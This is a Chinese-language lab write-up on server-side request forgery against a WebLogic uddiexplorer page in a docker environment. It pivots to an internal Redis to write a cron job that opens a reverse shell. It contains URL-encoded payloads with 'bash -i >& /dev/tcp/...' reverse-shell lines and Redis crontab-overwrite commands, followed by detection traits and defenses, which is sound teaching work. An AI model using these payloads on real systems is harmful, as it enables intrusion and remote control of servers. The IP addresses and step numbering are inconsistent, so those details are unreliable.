1.原理
SSRF服务端请求伪造(Server-Side Request Forgery),是一种由攻击者构造形成由服务器端发起请求的一个漏洞。利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统SSRF攻击的目标是从外网无法访问的内部系统。
2.ssrf实验准备
攻击机kali: ip: 192.168.3.180
靶机ubuntu: ip: 192.168.3.163
3.ssrf实验步骤:
1.启动靶场
docker-compose up -d
2.查看开放端口
docker ps
可以看到weblogic的端口是7001,redis的端口是6379
3.打开漏洞,bp抓包
http://your-ip:7001/uddiexplorer/,即http://192.168.3.163:7001/uddiexplorer/,得到如下图所示
4.网站地址url解码
5.验证7001端口
6.反证任意端口,如7002
7.获取redis的IP
输入docker exec -it redis的ip /bin/bash,
即
docker exec -it c4ddc5570fbf /bin/bash
redis的IP为170.23.0.2
8.构建反弹shell命令
不过我建议用方法二,因为我用方法一编码从来没有成功反弹过,你头铁你可以试试
1.方法一
http://172.18.0.2:6379/test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.3.170/777 0>&1\n\n\n\n"
config set dir /etc/
0Aconfig set dbfilename crontab
save
aaa
即
http%3A%2F%2F172.23.0.2%3A6379%2Ftest%0A%0A%0A%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.3.180%2F777%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0A%0Aconfig%20set%20dir%20%2Fetc%2F%0A%0A0Aconfig%20set%20dbfilename%20crontab%0A%0Asave%0A%0A%0A%0Aaaa
2.方法二
把下图三个框中信息改成自己的就好
http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%2 0dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
15.查看攻击机kali的ip, 确定为192.168.3.132
9.获取反弹shell
注:下图左边的pyload必须是有颜色的
4.内网提权,维持权限等
5.流量特征
对访问网址信息进行检测
http:探查主机存活状况
file:在有回显的情况下,实现任意文件的读取
dict:通过页面回显内容和时间猜测端口开放情况,探测浏览器版本信息等
gopher:截取POST/GET请求包,伪造为符合gopher协议的请求包,在一定条件下实现redis未授权访问
会有主机存活和端口扫描的探测行为
看请求体里会有url编码的信息,解码后会发现恶意语句
6.防御方式
禁用不需要的协议:只允许http和https请求
过滤返回的信息:验证返回信息是否符合标准
内网IP黑名单:避免被用来获取内网数据
限制请求的端口号:只允许http和https等端口开放,如80,443等